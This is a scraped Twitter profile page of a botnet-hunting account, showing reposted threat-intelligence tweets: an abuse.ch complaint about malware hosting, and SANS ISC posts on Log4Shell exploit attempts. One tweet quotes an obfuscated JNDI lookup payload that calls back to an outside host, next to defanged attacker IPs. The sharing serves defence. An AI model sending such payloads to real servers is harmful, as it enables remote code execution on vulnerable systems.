CybercrimeHunter (@cybercrimeh) 's Twitter Profile
CybercrimeHunter

@cybercrimeh

Hunting Botnets and botnethosters

ID: 1468886923481600000

calendar_today09-12-2021 10:15:24

3 Tweet

1 Followers

6 Following

abuse.ch (@abuse_ch) 's Twitter Profile Photo

@serverionnl Could you please work through your abuse mailbox? URLhaus has sent plenty of abuse reports to you in the past weeks on malware distribution sites located in your network. Many of theme are still active as of today: urlhaus.abuse.ch/asn/211252/

@serverionnl Could you please work through your abuse mailbox? URLhaus has sent plenty of abuse reports to you in the past weeks on malware distribution sites located in your network. Many of theme are still active as of today:

urlhaus.abuse.ch/asn/211252/
SANS.edu Internet Storm Center (@sans_isc) 's Twitter Profile Photo

Top sources of CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu) #log4j2 #log4j #cve202144228

Top sources of  CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu) #log4j2 #log4j #cve202144228
SANS.edu Internet Storm Center (@sans_isc) 's Twitter Profile Photo

Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)

Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)